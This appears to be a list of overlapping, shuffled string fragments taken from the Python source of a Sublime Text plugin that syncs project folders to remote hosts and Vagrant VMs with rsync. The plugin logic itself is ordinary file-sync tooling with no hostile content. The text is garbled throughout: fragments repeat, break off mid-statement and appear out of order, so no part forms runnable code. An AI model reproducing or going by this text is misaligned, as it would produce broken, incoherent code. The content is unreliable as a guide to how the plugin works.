"\"\"), o.get(\"rsyncOptions\", \"\"))) return True return sync_api.rsync_remote(found.get(\"path\", \"\"), found.get(\"remotePath\", \"\"), found.get(\"remoteOptions\", \"\"), found.get(\"rsyncOptions\",",
"def run(self, edit, paths): sublime.set_timeout_async(lambda: to_remote_async(paths[0]), 0) def to_remote_async(path): print(\"To local path\", path)",
"path\", userInput) if len(userInput) == 0: do_it(\"\", \"\") return True parts = userInput.split(\":\")",
"found.get(\"remoteOptions\", \"\"), found.get(\"rsyncOptions\", \"\")) # ============================================================================= class RemoteEdit(sublime_plugin.EventListener): \"\"\"Sync a local change out.\"\"\"",
"path) w = sublime.active_window() found = sublime_api.project_by_path(w, path) if found is None or",
"path) if found is None or found[\"remotePath\"] == \"\": add_remote_async(path, lambda o: sync_api.rsync_remote(path,",
"not\" + \" appear to contain a host\") return False more = parts[0].split(\"@\")",
"o.get(\"remotePath\", \"\"), path, o.get(\"remoteOptions\", \"\"), o.get(\"rsyncOptions\", \"\"))) return True return sync_api.rsync_remote(found.get(\"remotePath\", \"\"), found.get(\"path\",",
"callback is not None: callback(settings) remotePath = \"\" found = sublime_api.project_by_path(w, path) if",
"contain a host\") return False more = parts[0].split(\"@\") host = \"\" if len(more)",
"None), 0) def add_remote_async(path, callback): print(\"Local path\", path) w = sublime.active_window() def done_with_folder(userInput):",
"None: callback(settings) remotePath = \"\" found = sublime_api.project_by_path(w, path) if found is not",
"is None: return False return sync_api.rsync_remote_file(found.get(\"path\", \"\"), filename, found.get(\"remotePath\", \"\"), found.get(\"remoteOptions\", \"\"), found.get(\"rsyncOptions\",",
"ToRemote(sublime_plugin.TextCommand): \"\"\"Sync a local directory to a remote directory.\"\"\" def run(self, edit, paths):",
"sublime_api.show_quick_panel(vms, lambda i=-1: done_with_vm(userInput, vms, i)) else: do_it(userInput, \"\") return True def done_with_vm(remotePath,",
"vms = [\"Select VM below...\", \"---\"] vagrant_api.get_vm_list(vms) if len(vms) == 2: sublime_api.error_message(\"No vagrant",
"= vagrant_api.get_ssh_options(vm) print(\"ssh options\", sshOptions) if sshOptions != \"\": do_it(remotePath, sshOptions) def do_it(remotePath,",
"False print(\"VM selected\", vm) sshOptions = vagrant_api.get_ssh_options(vm) print(\"ssh options\", sshOptions) if sshOptions !=",
"sublime.active_window() def done_with_options(userInput): print(\"Options\", userInput) if len(userInput) == 0: do_it(sync_api.default_rsync_options()) return True do_it(userInput)",
"len(vms) == 3: done_with_vm(userInput, vms, 2) else: sublime_api.show_quick_panel(vms, lambda i=-1: done_with_vm(userInput, vms, i))",
"more = parts[0].split(\"@\") host = \"\" if len(more) > 2: sublime_api.error_message(\"Unable to parse",
"0) def from_remote_async(path): print(\"From local path\", path) w = sublime.active_window() found = sublime_api.project_by_path(w,",
"i)) else: do_it(userInput, \"\") return True def done_with_vm(remotePath, vms, userSelection): if userSelection ==",
"== \"\": add_remote_async(path, lambda o: sync_api.rsync_remote(path, o.get(\"remotePath\", \"\"), o.get(\"remoteOptions\", \"\"), o.get(\"rsyncOptions\", \"\"))) return",
"sync_api import remote.vagrant_api as vagrant_api # ============================================================================= class RsyncOptionsCommand(sublime_plugin.TextCommand): \"\"\"Override default rsync options",
"a local change out.\"\"\" def on_post_save_async(self, view): filename = view.file_name() w = sublime.active_window()",
"userInput) if len(userInput) == 0: do_it(\"\", \"\") return True parts = userInput.split(\":\") if",
"print(\"Options\", userInput) if len(userInput) == 0: do_it(sync_api.default_rsync_options()) return True do_it(userInput) return True def",
"-1: return False vm = vagrant_api.parse_vm_id(vms[userSelection]) if vm is None: return False print(\"VM",
"edit, paths): sublime.set_timeout_async(lambda: add_remote_async(paths[0], None), 0) def add_remote_async(path, callback): print(\"Local path\", path) w",
"= sublime.active_window() def done_with_options(userInput): print(\"Options\", userInput) if len(userInput) == 0: do_it(sync_api.default_rsync_options()) return True",
"None) # ============================================================================= class AddRemoteCommand(sublime_plugin.TextCommand): \"\"\"Map a new remote path to a local",
"filename) if found is None: return False return sync_api.rsync_remote_file(found.get(\"path\", \"\"), filename, found.get(\"remotePath\", \"\"),",
"print(\"VM selected\", vm) sshOptions = vagrant_api.get_ssh_options(vm) print(\"ssh options\", sshOptions) if sshOptions != \"\":",
"done_with_vm(userInput, vms, i)) else: do_it(userInput, \"\") return True def done_with_vm(remotePath, vms, userSelection): if",
"print(\"Local path\", path) w = sublime.active_window() def done_with_folder(userInput): print(\"Remote path\", userInput) if len(userInput)",
"sublime_api.error_message(\"The remote path you entered does not\" + \" appear to contain a",
"\"\"), o.get(\"remoteOptions\", \"\"), o.get(\"rsyncOptions\", \"\"))) return True return sync_api.rsync_remote(found.get(\"path\", \"\"), found.get(\"remotePath\", \"\"), found.get(\"remoteOptions\",",
"lambda o: sync_api.rsync_remote( o.get(\"remotePath\", \"\"), path, o.get(\"remoteOptions\", \"\"), o.get(\"rsyncOptions\", \"\"))) return True return",
"o.get(\"remoteOptions\", \"\"), o.get(\"rsyncOptions\", \"\"))) return True return sync_api.rsync_remote(found.get(\"remotePath\", \"\"), found.get(\"path\", \"\"), found.get(\"remoteOptions\", \"\"),",
"sublime_api.project_by_path(w, filename) if found is None: return False return sync_api.rsync_remote_file(found.get(\"path\", \"\"), filename, found.get(\"remotePath\",",
"# ============================================================================= class ToRemote(sublime_plugin.TextCommand): \"\"\"Sync a local directory to a remote directory.\"\"\" def",
"if sshOptions != \"\": do_it(remotePath, sshOptions) def do_it(remotePath, sshOptions): settings = {\"remotePath\": remotePath,",
"== \"\": add_remote_async(path, lambda o: sync_api.rsync_remote( o.get(\"remotePath\", \"\"), path, o.get(\"remoteOptions\", \"\"), o.get(\"rsyncOptions\", \"\")))",
"as sublime_api import remote.sync_api as sync_api import remote.vagrant_api as vagrant_api # ============================================================================= class",
"a local project path.\"\"\" def run(self, edit, paths): sublime.set_timeout_async(lambda: add_remote_async(paths[0], None), 0) def",
"if len(vms) == 3: done_with_vm(userInput, vms, 2) else: sublime_api.show_quick_panel(vms, lambda i=-1: done_with_vm(userInput, vms,",
"host = more[1] else: host = more[0] if host == \"vagrant\": vms =",
"\"vagrant\": vms = [\"Select VM below...\", \"---\"] vagrant_api.get_vm_list(vms) if len(vms) == 2: sublime_api.error_message(\"No",
"remote.vagrant_api as vagrant_api # ============================================================================= class RsyncOptionsCommand(sublime_plugin.TextCommand): \"\"\"Override default rsync options for Remote.\"\"\"",
"\"---\"] vagrant_api.get_vm_list(vms) if len(vms) == 2: sublime_api.error_message(\"No vagrant VMs found\") return False if",
"callback is not None: callback(settings) options = sync_api.default_rsync_options() found = sublime_api.project_by_path(w, path) if",
"True def done_with_vm(remotePath, vms, userSelection): if userSelection == -1: return False vm =",
"True parts = userInput.split(\":\") if len(parts) != 2: sublime_api.error_message(\"The remote path you entered",
"remote directory.\"\"\" def run(self, edit, paths): sublime.set_timeout_async(lambda: to_remote_async(paths[0]), 0) def to_remote_async(path): print(\"To local",
"print(\"ssh options\", sshOptions) if sshOptions != \"\": do_it(remotePath, sshOptions) def do_it(remotePath, sshOptions): settings",
"\"\"\"Override default rsync options for Remote.\"\"\" def run(self, edit, paths): sublime.set_timeout_async(lambda: rsync_options(paths[0], None),",
"found.get(\"remotePath\", \"\"), found.get(\"remoteOptions\", \"\"), found.get(\"rsyncOptions\", \"\")) # ============================================================================= class RemoteEdit(sublime_plugin.EventListener): \"\"\"Sync a local",
"not None and found[\"remotePath\"] != \"\": remotePath = found[\"remotePath\"] sublime_api.show_input_panel(\"Sync this folder to",
"None or found[\"remotePath\"] == \"\": add_remote_async(path, lambda o: sync_api.rsync_remote(path, o.get(\"remotePath\", \"\"), o.get(\"remoteOptions\", \"\"),",
"subprocess import threading sys.path.append(os.path.dirname(os.path.abspath(__file__))) import remote.sublime_api as sublime_api import remote.sync_api as sync_api import",
"{\"rsyncOptions\": rsyncOptions} sublime_api.update_project_settings(w, path, settings) if callback is not None: callback(settings) options =",
"\"\"))) return True return sync_api.rsync_remote(found.get(\"remotePath\", \"\"), found.get(\"path\", \"\"), found.get(\"remoteOptions\", \"\"), found.get(\"rsyncOptions\", \"\")) #",
"o.get(\"rsyncOptions\", \"\"))) return True return sync_api.rsync_remote(found.get(\"path\", \"\"), found.get(\"remotePath\", \"\"), found.get(\"remoteOptions\", \"\"), found.get(\"rsyncOptions\", \"\"))",
"is None or found[\"remotePath\"] == \"\": add_remote_async(path, lambda o: sync_api.rsync_remote( o.get(\"remotePath\", \"\"), path,",
"\"\": remotePath = found[\"remotePath\"] sublime_api.show_input_panel(\"Sync this folder to remote folder:\", remotePath, done_with_folder, None,",
"class RsyncOptionsCommand(sublime_plugin.TextCommand): \"\"\"Override default rsync options for Remote.\"\"\" def run(self, edit, paths): sublime.set_timeout_async(lambda:",
"o.get(\"remoteOptions\", \"\"), o.get(\"rsyncOptions\", \"\"))) return True return sync_api.rsync_remote(found.get(\"path\", \"\"), found.get(\"remotePath\", \"\"), found.get(\"remoteOptions\", \"\"),",
"sublime.active_window() def done_with_folder(userInput): print(\"Remote path\", userInput) if len(userInput) == 0: do_it(\"\", \"\") return",
"the remote path you\" + \" entered\") return False elif len(more) == 2:",
"== 2: sublime_api.error_message(\"No vagrant VMs found\") return False if len(vms) == 3: done_with_vm(userInput,",
"userSelection == -1: return False vm = vagrant_api.parse_vm_id(vms[userSelection]) if vm is None: return",
"options for Remote.\"\"\" def run(self, edit, paths): sublime.set_timeout_async(lambda: rsync_options(paths[0], None), 0) def rsync_options(path,",
"def from_remote_async(path): print(\"From local path\", path) w = sublime.active_window() found = sublime_api.project_by_path(w, path)",
"done_with_options(userInput): print(\"Options\", userInput) if len(userInput) == 0: do_it(sync_api.default_rsync_options()) return True do_it(userInput) return True",
"vm) sshOptions = vagrant_api.get_ssh_options(vm) print(\"ssh options\", sshOptions) if sshOptions != \"\": do_it(remotePath, sshOptions)",
"is not None: callback(settings) options = sync_api.default_rsync_options() found = sublime_api.project_by_path(w, path) if found",
"this folder to remote folder:\", remotePath, done_with_folder, None, None) # ============================================================================= class FromRemote(sublime_plugin.TextCommand):",
"print(\"Remote path\", userInput) if len(userInput) == 0: do_it(\"\", \"\") return True parts =",
"sublime.set_timeout_async(lambda: to_remote_async(paths[0]), 0) def to_remote_async(path): print(\"To local path\", path) w = sublime.active_window() found",
"def on_post_save_async(self, view): filename = view.file_name() w = sublime.active_window() found = sublime_api.project_by_path(w, filename)",
"remotePath, \"remoteOptions\": sshOptions} sublime_api.update_project_settings(w, path, settings) if callback is not None: callback(settings) remotePath",
"import remote.sublime_api as sublime_api import remote.sync_api as sync_api import remote.vagrant_api as vagrant_api #",
"if vm is None: return False print(\"VM selected\", vm) sshOptions = vagrant_api.get_ssh_options(vm) print(\"ssh",
"if found is None: return False return sync_api.rsync_remote_file(found.get(\"path\", \"\"), filename, found.get(\"remotePath\", \"\"), found.get(\"remoteOptions\",",
"not None and found[\"rsyncOptions\"] != \"\": options = found[\"rsyncOptions\"] sublime_api.show_input_panel(\"Use these rsync options:\",",
"is not None and found[\"remotePath\"] != \"\": remotePath = found[\"remotePath\"] sublime_api.show_input_panel(\"Sync this folder",
"path) if found is not None and found[\"rsyncOptions\"] != \"\": options = found[\"rsyncOptions\"]",
"2: sublime_api.error_message(\"The remote path you entered does not\" + \" appear to contain",
"vm is None: return False print(\"VM selected\", vm) sshOptions = vagrant_api.get_ssh_options(vm) print(\"ssh options\",",
"return True return sync_api.rsync_remote(found.get(\"path\", \"\"), found.get(\"remotePath\", \"\"), found.get(\"remoteOptions\", \"\"), found.get(\"rsyncOptions\", \"\")) # =============================================================================",
"options\", sshOptions) if sshOptions != \"\": do_it(remotePath, sshOptions) def do_it(remotePath, sshOptions): settings =",
"== 0: do_it(sync_api.default_rsync_options()) return True do_it(userInput) return True def do_it(rsyncOptions): settings = {\"rsyncOptions\":",
"= sublime_api.project_by_path(w, path) if found is not None and found[\"rsyncOptions\"] != \"\": options",
"== 2: host = more[1] else: host = more[0] if host == \"vagrant\":",
"def done_with_options(userInput): print(\"Options\", userInput) if len(userInput) == 0: do_it(sync_api.default_rsync_options()) return True do_it(userInput) return",
"default rsync options for Remote.\"\"\" def run(self, edit, paths): sublime.set_timeout_async(lambda: rsync_options(paths[0], None), 0)",
"add_remote_async(path, lambda o: sync_api.rsync_remote(path, o.get(\"remotePath\", \"\"), o.get(\"remoteOptions\", \"\"), o.get(\"rsyncOptions\", \"\"))) return True return",
"else: do_it(userInput, \"\") return True def done_with_vm(remotePath, vms, userSelection): if userSelection == -1:",
"vagrant_api.get_ssh_options(vm) print(\"ssh options\", sshOptions) if sshOptions != \"\": do_it(remotePath, sshOptions) def do_it(remotePath, sshOptions):",
"o.get(\"remotePath\", \"\"), o.get(\"remoteOptions\", \"\"), o.get(\"rsyncOptions\", \"\"))) return True return sync_api.rsync_remote(found.get(\"path\", \"\"), found.get(\"remotePath\", \"\"),",
"found[\"remotePath\"] == \"\": add_remote_async(path, lambda o: sync_api.rsync_remote( o.get(\"remotePath\", \"\"), path, o.get(\"remoteOptions\", \"\"), o.get(\"rsyncOptions\",",
"def do_it(remotePath, sshOptions): settings = {\"remotePath\": remotePath, \"remoteOptions\": sshOptions} sublime_api.update_project_settings(w, path, settings) if",
"None and found[\"remotePath\"] != \"\": remotePath = found[\"remotePath\"] sublime_api.show_input_panel(\"Sync this folder to remote",
"sublime_api.project_by_path(w, path) if found is None or found[\"remotePath\"] == \"\": add_remote_async(path, lambda o:",
"len(more) > 2: sublime_api.error_message(\"Unable to parse the remote path you\" + \" entered\")",
"edit, paths): sublime.set_timeout_async(lambda: to_remote_async(paths[0]), 0) def to_remote_async(path): print(\"To local path\", path) w =",
"= userInput.split(\":\") if len(parts) != 2: sublime_api.error_message(\"The remote path you entered does not\"",
"and found[\"rsyncOptions\"] != \"\": options = found[\"rsyncOptions\"] sublime_api.show_input_panel(\"Use these rsync options:\", options, done_with_options,",
"============================================================================= class FromRemote(sublime_plugin.TextCommand): \"\"\"Sync a local directory from a remote directory.\"\"\" def run(self,",
"import sys import sublime import sublime_plugin import subprocess import threading sys.path.append(os.path.dirname(os.path.abspath(__file__))) import remote.sublime_api",
"vagrant_api.parse_vm_id(vms[userSelection]) if vm is None: return False print(\"VM selected\", vm) sshOptions = vagrant_api.get_ssh_options(vm)",
"sys.path.append(os.path.dirname(os.path.abspath(__file__))) import remote.sublime_api as sublime_api import remote.sync_api as sync_api import remote.vagrant_api as vagrant_api",
"return sync_api.rsync_remote(found.get(\"remotePath\", \"\"), found.get(\"path\", \"\"), found.get(\"remoteOptions\", \"\"), found.get(\"rsyncOptions\", \"\")) # ============================================================================= class ToRemote(sublime_plugin.TextCommand):",
"remote path you entered does not\" + \" appear to contain a host\")",
"path, settings) if callback is not None: callback(settings) options = sync_api.default_rsync_options() found =",
"change out.\"\"\" def on_post_save_async(self, view): filename = view.file_name() w = sublime.active_window() found =",
"remotePath, done_with_folder, None, None) # ============================================================================= class FromRemote(sublime_plugin.TextCommand): \"\"\"Sync a local directory from",
"found\") return False if len(vms) == 3: done_with_vm(userInput, vms, 2) else: sublime_api.show_quick_panel(vms, lambda",
"vm = vagrant_api.parse_vm_id(vms[userSelection]) if vm is None: return False print(\"VM selected\", vm) sshOptions",
"\" appear to contain a host\") return False more = parts[0].split(\"@\") host =",
"host == \"vagrant\": vms = [\"Select VM below...\", \"---\"] vagrant_api.get_vm_list(vms) if len(vms) ==",
"!= \"\": remotePath = found[\"remotePath\"] sublime_api.show_input_panel(\"Sync this folder to remote folder:\", remotePath, done_with_folder,",
"add_remote_async(paths[0], None), 0) def add_remote_async(path, callback): print(\"Local path\", path) w = sublime.active_window() def",
"a local directory to a remote directory.\"\"\" def run(self, edit, paths): sublime.set_timeout_async(lambda: to_remote_async(paths[0]),",
"callback): print(\"Local path\", path) w = sublime.active_window() def done_with_folder(userInput): print(\"Remote path\", userInput) if",
"found is None or found[\"remotePath\"] == \"\": add_remote_async(path, lambda o: sync_api.rsync_remote(path, o.get(\"remotePath\", \"\"),",
"vms, i)) else: do_it(userInput, \"\") return True def done_with_vm(remotePath, vms, userSelection): if userSelection",
"to a remote directory.\"\"\" def run(self, edit, paths): sublime.set_timeout_async(lambda: to_remote_async(paths[0]), 0) def to_remote_async(path):",
"sublime.set_timeout_async(lambda: add_remote_async(paths[0], None), 0) def add_remote_async(path, callback): print(\"Local path\", path) w = sublime.active_window()",
"\"\")) # ============================================================================= class ToRemote(sublime_plugin.TextCommand): \"\"\"Sync a local directory to a remote directory.\"\"\"",
"print(\"Local path\", path) w = sublime.active_window() def done_with_options(userInput): print(\"Options\", userInput) if len(userInput) ==",
"\"\"), found.get(\"remotePath\", \"\"), found.get(\"remoteOptions\", \"\"), found.get(\"rsyncOptions\", \"\")) # ============================================================================= class RemoteEdit(sublime_plugin.EventListener): \"\"\"Sync a",
"remotePath = found[\"remotePath\"] sublime_api.show_input_panel(\"Sync this folder to remote folder:\", remotePath, done_with_folder, None, None)",
"from_remote_async(paths[0]), 0) def from_remote_async(path): print(\"From local path\", path) w = sublime.active_window() found =",
"# ============================================================================= class AddRemoteCommand(sublime_plugin.TextCommand): \"\"\"Map a new remote path to a local project",
"sshOptions) def do_it(remotePath, sshOptions): settings = {\"remotePath\": remotePath, \"remoteOptions\": sshOptions} sublime_api.update_project_settings(w, path, settings)",
"== 0: do_it(\"\", \"\") return True parts = userInput.split(\":\") if len(parts) != 2:",
"http://github.com/devaos/sublime-remote/blob/master/LICENSE \"\"\"This module implements the Sublime Text 3 commands provided by remote.\"\"\" import",
"path you entered does not\" + \" appear to contain a host\") return",
"view): filename = view.file_name() w = sublime.active_window() found = sublime_api.project_by_path(w, filename) if found",
"remotePath = \"\" found = sublime_api.project_by_path(w, path) if found is not None and",
"None: callback(settings) options = sync_api.default_rsync_options() found = sublime_api.project_by_path(w, path) if found is not",
"= [\"Select VM below...\", \"---\"] vagrant_api.get_vm_list(vms) if len(vms) == 2: sublime_api.error_message(\"No vagrant VMs",
"Sublime Text 3 commands provided by remote.\"\"\" import os import re import sys",
"directory from a remote directory.\"\"\" def run(self, edit, paths): sublime.set_timeout_async(lambda: from_remote_async(paths[0]), 0) def",
"o: sync_api.rsync_remote( o.get(\"remotePath\", \"\"), path, o.get(\"remoteOptions\", \"\"), o.get(\"rsyncOptions\", \"\"))) return True return sync_api.rsync_remote(found.get(\"remotePath\",",
"edit, paths): sublime.set_timeout_async(lambda: from_remote_async(paths[0]), 0) def from_remote_async(path): print(\"From local path\", path) w =",
"found is not None and found[\"remotePath\"] != \"\": remotePath = found[\"remotePath\"] sublime_api.show_input_panel(\"Sync this",
"do_it(remotePath, sshOptions): settings = {\"remotePath\": remotePath, \"remoteOptions\": sshOptions} sublime_api.update_project_settings(w, path, settings) if callback",
"= found[\"rsyncOptions\"] sublime_api.show_input_panel(\"Use these rsync options:\", options, done_with_options, None, None) # ============================================================================= class",
"<NAME> # http://github.com/devaos/sublime-remote/blob/master/LICENSE \"\"\"This module implements the Sublime Text 3 commands provided by",
"+ \" entered\") return False elif len(more) == 2: host = more[1] else:",
"options:\", options, done_with_options, None, None) # ============================================================================= class AddRemoteCommand(sublime_plugin.TextCommand): \"\"\"Map a new remote",
"paths): sublime.set_timeout_async(lambda: rsync_options(paths[0], None), 0) def rsync_options(path, callback): print(\"Local path\", path) w =",
"\"\": do_it(remotePath, sshOptions) def do_it(remotePath, sshOptions): settings = {\"remotePath\": remotePath, \"remoteOptions\": sshOptions} sublime_api.update_project_settings(w,",
"False vm = vagrant_api.parse_vm_id(vms[userSelection]) if vm is None: return False print(\"VM selected\", vm)",
"is not None: callback(settings) remotePath = \"\" found = sublime_api.project_by_path(w, path) if found",
"0) def add_remote_async(path, callback): print(\"Local path\", path) w = sublime.active_window() def done_with_folder(userInput): print(\"Remote",
"elif len(more) == 2: host = more[1] else: host = more[0] if host",
"sublime_api.show_input_panel(\"Use these rsync options:\", options, done_with_options, None, None) # ============================================================================= class AddRemoteCommand(sublime_plugin.TextCommand): \"\"\"Map",
"remote.\"\"\" import os import re import sys import sublime import sublime_plugin import subprocess",
"if found is not None and found[\"remotePath\"] != \"\": remotePath = found[\"remotePath\"] sublime_api.show_input_panel(\"Sync",
"these rsync options:\", options, done_with_options, None, None) # ============================================================================= class AddRemoteCommand(sublime_plugin.TextCommand): \"\"\"Map a",
"run(self, edit, paths): sublime.set_timeout_async(lambda: to_remote_async(paths[0]), 0) def to_remote_async(path): print(\"To local path\", path) w",
"rsyncOptions} sublime_api.update_project_settings(w, path, settings) if callback is not None: callback(settings) options = sync_api.default_rsync_options()",
"FromRemote(sublime_plugin.TextCommand): \"\"\"Sync a local directory from a remote directory.\"\"\" def run(self, edit, paths):",
"!= 2: sublime_api.error_message(\"The remote path you entered does not\" + \" appear to",
"and found[\"remotePath\"] != \"\": remotePath = found[\"remotePath\"] sublime_api.show_input_panel(\"Sync this folder to remote folder:\",",
"if len(userInput) == 0: do_it(sync_api.default_rsync_options()) return True do_it(userInput) return True def do_it(rsyncOptions): settings",
"-*- # # Copyright (c) 2014 <NAME> # http://github.com/devaos/sublime-remote/blob/master/LICENSE \"\"\"This module implements the",
"2) else: sublime_api.show_quick_panel(vms, lambda i=-1: done_with_vm(userInput, vms, i)) else: do_it(userInput, \"\") return True",
"None or found[\"remotePath\"] == \"\": add_remote_async(path, lambda o: sync_api.rsync_remote( o.get(\"remotePath\", \"\"), path, o.get(\"remoteOptions\",",
"settings) if callback is not None: callback(settings) options = sync_api.default_rsync_options() found = sublime_api.project_by_path(w,",
"a local directory from a remote directory.\"\"\" def run(self, edit, paths): sublime.set_timeout_async(lambda: from_remote_async(paths[0]),",
"-*- coding: utf-8 -*- # # Copyright (c) 2014 <NAME> # http://github.com/devaos/sublime-remote/blob/master/LICENSE \"\"\"This",
"if found is None or found[\"remotePath\"] == \"\": add_remote_async(path, lambda o: sync_api.rsync_remote( o.get(\"remotePath\",",
"def done_with_folder(userInput): print(\"Remote path\", userInput) if len(userInput) == 0: do_it(\"\", \"\") return True",
"remote.sync_api as sync_api import remote.vagrant_api as vagrant_api # ============================================================================= class RsyncOptionsCommand(sublime_plugin.TextCommand): \"\"\"Override default",
"found.get(\"rsyncOptions\", \"\")) # ============================================================================= class ToRemote(sublime_plugin.TextCommand): \"\"\"Sync a local directory to a remote",
"import sublime_plugin import subprocess import threading sys.path.append(os.path.dirname(os.path.abspath(__file__))) import remote.sublime_api as sublime_api import remote.sync_api",
"w = sublime.active_window() found = sublime_api.project_by_path(w, filename) if found is None: return False",
"sshOptions): settings = {\"remotePath\": remotePath, \"remoteOptions\": sshOptions} sublime_api.update_project_settings(w, path, settings) if callback is",
"below...\", \"---\"] vagrant_api.get_vm_list(vms) if len(vms) == 2: sublime_api.error_message(\"No vagrant VMs found\") return False",
"directory to a remote directory.\"\"\" def run(self, edit, paths): sublime.set_timeout_async(lambda: to_remote_async(paths[0]), 0) def",
"do_it(sync_api.default_rsync_options()) return True do_it(userInput) return True def do_it(rsyncOptions): settings = {\"rsyncOptions\": rsyncOptions} sublime_api.update_project_settings(w,",
"a remote directory.\"\"\" def run(self, edit, paths): sublime.set_timeout_async(lambda: from_remote_async(paths[0]), 0) def from_remote_async(path): print(\"From",
"do_it(rsyncOptions): settings = {\"rsyncOptions\": rsyncOptions} sublime_api.update_project_settings(w, path, settings) if callback is not None:",
"not None: callback(settings) remotePath = \"\" found = sublime_api.project_by_path(w, path) if found is",
"rsync_options(paths[0], None), 0) def rsync_options(path, callback): print(\"Local path\", path) w = sublime.active_window() def",
"AddRemoteCommand(sublime_plugin.TextCommand): \"\"\"Map a new remote path to a local project path.\"\"\" def run(self,",
"new remote path to a local project path.\"\"\" def run(self, edit, paths): sublime.set_timeout_async(lambda:",
"sshOptions) if sshOptions != \"\": do_it(remotePath, sshOptions) def do_it(remotePath, sshOptions): settings = {\"remotePath\":",
"sshOptions != \"\": do_it(remotePath, sshOptions) def do_it(remotePath, sshOptions): settings = {\"remotePath\": remotePath, \"remoteOptions\":",
"settings = {\"rsyncOptions\": rsyncOptions} sublime_api.update_project_settings(w, path, settings) if callback is not None: callback(settings)",
"settings = {\"remotePath\": remotePath, \"remoteOptions\": sshOptions} sublime_api.update_project_settings(w, path, settings) if callback is not",
"local change out.\"\"\" def on_post_save_async(self, view): filename = view.file_name() w = sublime.active_window() found",
"(c) 2014 <NAME> # http://github.com/devaos/sublime-remote/blob/master/LICENSE \"\"\"This module implements the Sublime Text 3 commands",
"userInput.split(\":\") if len(parts) != 2: sublime_api.error_message(\"The remote path you entered does not\" +",
"class ToRemote(sublime_plugin.TextCommand): \"\"\"Sync a local directory to a remote directory.\"\"\" def run(self, edit,",
"path.\"\"\" def run(self, edit, paths): sublime.set_timeout_async(lambda: add_remote_async(paths[0], None), 0) def add_remote_async(path, callback): print(\"Local",
"\"\")) # ============================================================================= class RemoteEdit(sublime_plugin.EventListener): \"\"\"Sync a local change out.\"\"\" def on_post_save_async(self, view):",
"remote.sublime_api as sublime_api import remote.sync_api as sync_api import remote.vagrant_api as vagrant_api # =============================================================================",
"= sublime_api.project_by_path(w, path) if found is None or found[\"remotePath\"] == \"\": add_remote_async(path, lambda",
"print(\"From local path\", path) w = sublime.active_window() found = sublime_api.project_by_path(w, path) if found",
"!= \"\": options = found[\"rsyncOptions\"] sublime_api.show_input_panel(\"Use these rsync options:\", options, done_with_options, None, None)",
"sublime_api.error_message(\"No vagrant VMs found\") return False if len(vms) == 3: done_with_vm(userInput, vms, 2)",
"============================================================================= class RsyncOptionsCommand(sublime_plugin.TextCommand): \"\"\"Override default rsync options for Remote.\"\"\" def run(self, edit, paths):",
"return True def do_it(rsyncOptions): settings = {\"rsyncOptions\": rsyncOptions} sublime_api.update_project_settings(w, path, settings) if callback",
"sync_api.default_rsync_options() found = sublime_api.project_by_path(w, path) if found is not None and found[\"rsyncOptions\"] !=",
"0: do_it(\"\", \"\") return True parts = userInput.split(\":\") if len(parts) != 2: sublime_api.error_message(\"The",
"project path.\"\"\" def run(self, edit, paths): sublime.set_timeout_async(lambda: add_remote_async(paths[0], None), 0) def add_remote_async(path, callback):",
"# Copyright (c) 2014 <NAME> # http://github.com/devaos/sublime-remote/blob/master/LICENSE \"\"\"This module implements the Sublime Text",
"!= \"\": do_it(remotePath, sshOptions) def do_it(remotePath, sshOptions): settings = {\"remotePath\": remotePath, \"remoteOptions\": sshOptions}",
"\"\") return True def done_with_vm(remotePath, vms, userSelection): if userSelection == -1: return False",
"done_with_vm(userInput, vms, 2) else: sublime_api.show_quick_panel(vms, lambda i=-1: done_with_vm(userInput, vms, i)) else: do_it(userInput, \"\")",
"True do_it(userInput) return True def do_it(rsyncOptions): settings = {\"rsyncOptions\": rsyncOptions} sublime_api.update_project_settings(w, path, settings)",
"parts = userInput.split(\":\") if len(parts) != 2: sublime_api.error_message(\"The remote path you entered does",
"for Remote.\"\"\" def run(self, edit, paths): sublime.set_timeout_async(lambda: rsync_options(paths[0], None), 0) def rsync_options(path, callback):",
"False more = parts[0].split(\"@\") host = \"\" if len(more) > 2: sublime_api.error_message(\"Unable to",
"path\", path) w = sublime.active_window() def done_with_options(userInput): print(\"Options\", userInput) if len(userInput) == 0:",
"else: host = more[0] if host == \"vagrant\": vms = [\"Select VM below...\",",
"RsyncOptionsCommand(sublime_plugin.TextCommand): \"\"\"Override default rsync options for Remote.\"\"\" def run(self, edit, paths): sublime.set_timeout_async(lambda: rsync_options(paths[0],",
"i=-1: done_with_vm(userInput, vms, i)) else: do_it(userInput, \"\") return True def done_with_vm(remotePath, vms, userSelection):",
"from_remote_async(path): print(\"From local path\", path) w = sublime.active_window() found = sublime_api.project_by_path(w, path) if",
"sync_api.rsync_remote(found.get(\"remotePath\", \"\"), found.get(\"path\", \"\"), found.get(\"remoteOptions\", \"\"), found.get(\"rsyncOptions\", \"\")) # ============================================================================= class ToRemote(sublime_plugin.TextCommand): \"\"\"Sync",
"found.get(\"remoteOptions\", \"\"), found.get(\"rsyncOptions\", \"\")) # ============================================================================= class ToRemote(sublime_plugin.TextCommand): \"\"\"Sync a local directory to",
"sync_api.rsync_remote(path, o.get(\"remotePath\", \"\"), o.get(\"remoteOptions\", \"\"), o.get(\"rsyncOptions\", \"\"))) return True return sync_api.rsync_remote(found.get(\"path\", \"\"), found.get(\"remotePath\",",
"sublime_api.project_by_path(w, path) if found is not None and found[\"rsyncOptions\"] != \"\": options =",
"callback): print(\"Local path\", path) w = sublime.active_window() def done_with_options(userInput): print(\"Options\", userInput) if len(userInput)",
"not None: callback(settings) options = sync_api.default_rsync_options() found = sublime_api.project_by_path(w, path) if found is",
"found is None: return False return sync_api.rsync_remote_file(found.get(\"path\", \"\"), filename, found.get(\"remotePath\", \"\"), found.get(\"remoteOptions\", \"\"),",
"len(vms) == 2: sublime_api.error_message(\"No vagrant VMs found\") return False if len(vms) == 3:",
"\"\": add_remote_async(path, lambda o: sync_api.rsync_remote( o.get(\"remotePath\", \"\"), path, o.get(\"remoteOptions\", \"\"), o.get(\"rsyncOptions\", \"\"))) return",
"vagrant_api.get_vm_list(vms) if len(vms) == 2: sublime_api.error_message(\"No vagrant VMs found\") return False if len(vms)",
"return True def done_with_vm(remotePath, vms, userSelection): if userSelection == -1: return False vm",
"if len(parts) != 2: sublime_api.error_message(\"The remote path you entered does not\" + \"",
"paths): sublime.set_timeout_async(lambda: to_remote_async(paths[0]), 0) def to_remote_async(path): print(\"To local path\", path) w = sublime.active_window()",
"def rsync_options(path, callback): print(\"Local path\", path) w = sublime.active_window() def done_with_options(userInput): print(\"Options\", userInput)",
"utf-8 -*- # # Copyright (c) 2014 <NAME> # http://github.com/devaos/sublime-remote/blob/master/LICENSE \"\"\"This module implements",
